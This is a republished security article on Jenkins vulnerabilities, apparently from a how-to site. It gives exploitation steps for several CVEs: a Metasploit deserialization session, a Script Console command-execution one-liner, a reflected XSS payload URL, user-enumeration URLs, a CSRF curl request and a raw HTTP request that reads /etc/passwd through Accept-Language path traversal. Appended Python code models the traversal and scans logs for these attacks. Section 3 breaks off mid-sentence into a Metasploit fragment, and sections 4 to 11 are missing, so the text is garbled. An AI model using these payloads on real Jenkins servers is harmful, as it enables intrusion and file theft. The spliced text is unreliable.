
Example Analysis of Jenkins vulnerabilities

2025-01-16 Update, from SLTechnology News&Howtos (Network Security)


Shulou(Shulou.com)05/31 Report--

This article walks through a number of Jenkins vulnerabilities by example. It is intended as a reference; interested readers may find it useful.

1. Introduction

Jenkins is an open source, Java-based software project used mainly for continuous integration (CI) and project management.

Jenkins features include:

Continuously building, releasing and testing software projects.

Monitoring jobs that are started by external calls.

2. Service detection and discovery

Fofa: app="Jenkins"

3. CVE-2017-1000353 Jenkins-CI remote code execution

3.1. Vulnerability description

This unauthenticated remote code execution vulnerability lets an attacker send a serialized Java SignedObject to the Jenkins CLI. When the CLI deserializes it through ObjectInputStream as a Command object, the blacklist-based protection mechanism is bypassed and arbitrary code is executed.

3.2. Affected version

All major versions of Jenkins are affected (including

127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.

After successful exploitation, the file wtf is created under the /tmp directory.

12. Remote command execution caused by unauthorized access to a Jenkins function

12.1. Vulnerability description

After logging in to Jenkins as an administrator, the "System Management" area of the back end offers a "Script Command Line" function (the Script Console). Its purpose is to run arbitrary scripts for administration, troubleshooting or diagnosis, so it can be used to execute system commands. This is a normal Jenkins feature, but because many administrator accounts use weak passwords, or the management back end allows unauthorized access, it can cause serious damage to the server running Jenkins.

12.2. Affected version

All versions: this is a normal Jenkins function, not a bug.

12.3. Exploitation

Open "System Management" - "Script Command Line".

Enter the following statement in the script command line to execute the corresponding system command:

println "whoami".execute().text

13. CVE-2019-10475 plug-in reflected XSS

13.1. Vulnerability description

The build-metrics plug-in generates some basic build metrics and is usually used together with the Jenkins sidebar link plug-in. It provides a reporting mechanism so that any user can go to the Jenkins dashboard and extract reports as needed. The vulnerability is in the build-metrics plug-in itself: a straightforward reflected XSS caused by failing to properly escape the label query parameter.

13.2. Affected version

360 FireLine plug-in, up to 1.7.2

Bitbucket OAuth plug-in, up to 0.9

Build-metrics plug-in, 1.3 and earlier

Deploy WebLogic plug-in, up to 4.1

Dynatrace Application Monitoring plug-in, up to 2.1.3

Dynatrace Application Monitoring plug-in, up to 2.1.4

ElasticBox Jenkins Kubernetes CI/CD plug-in, up to 1.3

Global Post Script plug-in, 1.1.4 and earlier

Libvirt Slaves plug-in, up to 1.8.5

Mattermost Notification plug-in, up to 2.7.0

Sonar Gerrit plug-in, up to 2.3

Zulip plug-in, 1.1.0 and earlier

13.3. Exploitation

The vulnerable plug-in is reachable at http://localhost:8080/plugin/build-metrics/ and the vulnerable parameter is label.

Payload is as follows:

http://192.168.1.75:8080/plugin/build-metrics/getBuildStats?label=alert("CVE-2019-10475")&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&Submit=Search

14. CVE-2018-1000110 user enumeration

14.1. Vulnerability description

The Git plug-in is one of the version control plug-ins used with Jenkins. A security vulnerability exists in the GitStatus.java file of CloudBees Jenkins Git Plugin 3.7.0 and earlier; an attacker can exploit it to obtain a list of nodes and users.

14.2. Affected version

CloudBees Jenkins Git Plugin 3.7.0 and earlier

14.3. Exploitation

Fuzzy search through the search endpoints:

http://x.x.x.x:8080/search/?q=a
http://x.x.x.x:8080/search/suggest?query=a

If the Git plug-in version is below 3.7, the following can also be used:

http://x.x.x.x:8080/git/search/?q=a
http://x.x.x.x:8080/git/search/suggest?query=a

15. CVE-2019-10352 path traversal arbitrary file write

15.1. Vulnerability description

CloudBees Jenkins (Hudson Labs) is a Java-based set of continuous integration tools developed by CloudBees in the United States. It is mainly used to monitor continuous software release/test projects and some scheduled tasks; LTS is its long-term support version. A path traversal vulnerability exists in core/src/main/java/hudson/model/FileParameterValue.java in CloudBees Jenkins 2.185 and earlier and LTS 2.176.1 and earlier, because special elements in the file path are not properly filtered. An attacker can exploit it to access locations outside the restricted directory.

15.2. Affected version

Jenkins LTS 2.176.2

Jenkins 2.186

15.3. Exploitation

First select "build a free-style software project" and name it test; then, as a restricted user, add a file parameter in the job configuration.

Choose Build with Parameters and, when building, upload an image file.

When the build is started, the file can be written to any location on the file system where the user running Jenkins has write permission.

16. CVE-2019-10300 GitLab plug-in cross-site request forgery

16.1. Vulnerability description

The GitLab plug-in is one of the build triggers in use; it lets GitLab trigger Jenkins builds when code is pushed or merge requests are created. A cross-site request forgery vulnerability exists in the GitLabConnectionConfig#doTestConnection form validation method of CloudBees Jenkins GitLab Plugin 1.5.11 and earlier, because the web application does not adequately verify that the request comes from a trusted user. An attacker can exploit this to make the server send unexpected requests through the affected client.

16.2. Affected version

Jenkins GitLab plug-in 1.5.11

16.3. Exploitation

The following is an example of an attack against a Jenkins 2.165 instance.

You need to download the plug-in:

https://mirrors.tuna.tsinghua.edu.cn/jenkins/plugins/gitlab-plugin/1.5.11/gitlab-plugin.hpi

The instance runs a vulnerable version of this plug-in and is configured to allow anonymous read access.

$ curl -s -X GET -G \
    -d 'url=http://127.0.0.1:7000/?' \
    -d 'clientBuilderId=autodetect' \
    -d 'apiTokenId=532ba431-e25d-4aad-bc74-fb5b2cc03bd7' \
    'http://127.0.0.1:8080/jenkins/descriptorByName/com.dabsquared.gitlabjenkins.connection.GitLabConnectionConfig/testConnection'

The request submitted by the plug-in to the remote server as HTTP GET will be similar to the following:

# First request from Jenkins (GET)
/api/v4/user
Accept: application/json
PRIVATE-TOKEN: ASecretTextEntry
Host: 127.0.0.1:7000
Connection: Keep-Alive

# Second request from Jenkins (GET)
/api/v3/user
Accept: application/json
PRIVATE-TOKEN: ASecretTextEntry
Host: 127.0.0.1:7000
Connection: Keep-Alive

17. CVE-2018-1999002 arbitrary file read

17.1. Vulnerability description

An arbitrary file read vulnerability exists in the Stapler web framework used by Jenkins. By sending a specially crafted HTTP request, an attacker can, without authorization, read the contents of any file on the Jenkins file system that the Jenkins main process can access.

17.2. Affected version

Jenkins weekly 2.132 and all previous versions

Jenkins LTS 2.121.1 and all previous versions

17.3. Exploitation

On a Windows server any file can be read; on a Linux server files can also be read under certain conditions.

If the requested URL is /plugin/credentials/.ini, then base is empty and the extension (the ext variable) is .ini. The code then makes a series of openURL attempts; in the last one, con = openURL(map(base + '_' + locale.getLanguage() + ext)), the language comes from the request, so the lookup requests _../windows/win.ini. Although the directory _.. does not exist, path normalisation on Windows resolves the traversal anyway, so the check is bypassed.

Without logging in (unauthorized), files can only be read if the administrator has enabled anonymous read access; otherwise a login is still required.
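The lookup described above, modelled as an added example (not Jenkins or Stapler code): the language tag is taken straight from Accept-Language, the candidate path is base + '_' + language + ext, and a Windows-style normalisation pass shows why the non-existent _.. segment does not stop the traversal. The plugin root, the normalisation model and the ISO 639 allow-list in the hardened variant are assumptions for illustration, not the upstream fix.

```python
"""Model of the localized-resource lookup behind CVE-2018-1999002.
Added example, not Jenkins/Stapler code: it mirrors the step
con = openURL(map(base + '_' + locale.getLanguage() + ext)) from the text.
PLUGIN_ROOT, windows_normalize() and LANG_RE are assumptions for illustration."""
import re

PLUGIN_ROOT = "C:/jenkins/plugins/credentials"   # constructed root directory


def language_from_header(accept_language: str) -> str:
    """Vulnerable behaviour: first Accept-Language value, lowercased, unvalidated."""
    first = accept_language.split(",")[0].split(";")[0]
    return first.split("-")[0].strip().lower()


def split_resource(path: str):
    """'.ini' -> base '' and ext '.ini', as the text describes."""
    idx = path.rfind(".")
    return (path, "") if idx < 0 else (path[:idx], path[idx:])


def windows_normalize(root: str, relative: str) -> str:
    """Model of Win32 path normalisation: trailing dots are stripped from each
    segment (so '_..' becomes '_'), then '..' pops the previous segment even
    though that segment never existed on disk.  Linux has no such step."""
    out = root.split("/")
    for seg in relative.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if len(out) > 1:
                out.pop()
            continue
        seg = seg.rstrip(". ")          # '_..' -> '_'
        if seg:
            out.append(seg)
    return "/".join(out)


def candidate_vulnerable(resource: str, accept_language: str) -> str:
    base, ext = split_resource(resource)
    rel = base + "_" + language_from_header(accept_language) + ext
    return windows_normalize(PLUGIN_ROOT, rel)


LANG_RE = re.compile(r"[a-z]{2,3}")   # ISO 639 style allow-list (assumed mitigation)


def candidate_hardened(resource: str, accept_language: str):
    """Refuse to build a path from a language tag that is not a plain code."""
    lang = language_from_header(accept_language)
    if not LANG_RE.fullmatch(lang):
        return None
    base, ext = split_resource(resource)
    return windows_normalize(PLUGIN_ROOT, base + "_" + lang + ext)
```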

Payload under Windows:

GET /plugin/credentials/.ini HTTP/1.1
Host: x.x.x.x:8080
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36
Origin: http://x.x.x.x:8080
Referer: http://x.x.x.x:8080/
Accept-Encoding: gzip, deflate
Accept-Language: /../etc/passwd
Cookie: JSESSIONID.450017e3=x6kdpnkcgllh28wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971
Connection: close

The PoC detection tool for this vulnerability can also be used to detect it and to decrypt the account password:

https://github.com/anntsmart/CVE/blob/master/cve-2018-1999002.py

18. CVE-2019-1003029 Script Security Plugin sandbox bypass

Like CVE-2019-1003005, this vulnerability is also caused by the Script Security plug-in. It is exploited in the same way as above; affected versions are below 1.55.
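A detection pass a defender can run over Jenkins access logs for the request shapes described in sections 12, 13, 14, 16 and 17, written as an added example rather than anything from the article or from Jenkins. The log lines are constructed, the NCSA-style log layout is assumed (the Jenkins access-log format is configurable), and the rule patterns are my own.

```python
"""Offline detection pass over Jenkins access-log lines for the request shapes
covered in sections 12, 13, 14, 16 and 17 above.  Added example, not part of the
article or of Jenkins; the log lines are constructed and an NCSA-style layout is
assumed (the Jenkins access-log format is configurable)."""
import re
from urllib.parse import unquote

# Each rule runs against the URL-decoded request target (path plus query).
RULES = [
    # section 12: /script is the URL of the Jenkins Script Console
    ("script-console", re.compile(r"^/script(\?|$)")),
    # section 13: build-metrics label parameter carrying markup or JS
    ("build-metrics-xss", re.compile(r"^/plugin/build-metrics/getBuildStats\?.*label=[^&]*[<>\"'(]")),
    # section 14: search / suggest endpoints used for user and node enumeration
    ("search-enumeration", re.compile(r"^(/git)?/search/(suggest)?\?(q|query)=")),
    # section 16: GET to the GitLab plug-in testConnection form validation with a url
    ("gitlab-testconnection", re.compile(r"GitLabConnectionConfig/testConnection\?.*url=")),
    # section 17: plug-in resource whose name is only an extension, e.g. /plugin/credentials/.ini
    ("stapler-dot-resource", re.compile(r"^/plugin/[^/]+/\.[A-Za-z0-9]+$")),
]
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(line: str) -> list:
    """Names of the rules that match one access-log line ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = unquote(m.group("target"))
    hits = [name for name, rx in RULES if rx.search(target)]
    # Every section above depends on anonymous access; flag it when the
    # authenticated-user field is '-'.
    if hits and m.group("user") == "-":
        hits.append("unauthenticated")
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [16/Jan/2025:10:00:01 +0000] "GET /plugin/credentials/.ini HTTP/1.1" 200 412',
    '10.0.0.5 - - [16/Jan/2025:10:00:02 +0000] "GET /search/suggest?query=a HTTP/1.1" 200 1530',
    '10.0.0.5 - - [16/Jan/2025:10:00:03 +0000] "GET /plugin/build-metrics/getBuildStats?label=%3Cscript%3Ealert(1)%3C/script%3E&range=2 HTTP/1.1" 200 9001',
    '10.0.0.5 - admin [16/Jan/2025:10:00:04 +0000] "GET /script HTTP/1.1" 200 7000',
    '10.0.0.9 - - [16/Jan/2025:10:00:05 +0000] "GET /jenkins/descriptorByName/com.dabsquared.gitlabjenkins.connection.GitLabConnectionConfig/testConnection?url=http://10.0.0.9:7000/ HTTP/1.1" 200 10',
    '10.0.0.7 - bob [16/Jan/2025:10:00:06 +0000] "GET /job/test/lastBuild/console HTTP/1.1" 200 2100',
]


def scan(lines=SAMPLE_LOG) -> list:
    """[(rule_names, line)] for every line that triggered at least one rule."""
    tagged = [(classify(l), l) for l in lines]
    return [(hits, l) for hits, l in tagged if hits]
```

The "unauthenticated" tag is the one to act on first: every section above only matters when the endpoint is reachable without a login.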

Thank you for reading. I hope this "Example Analysis of Jenkins vulnerabilities" has been helpful to you.
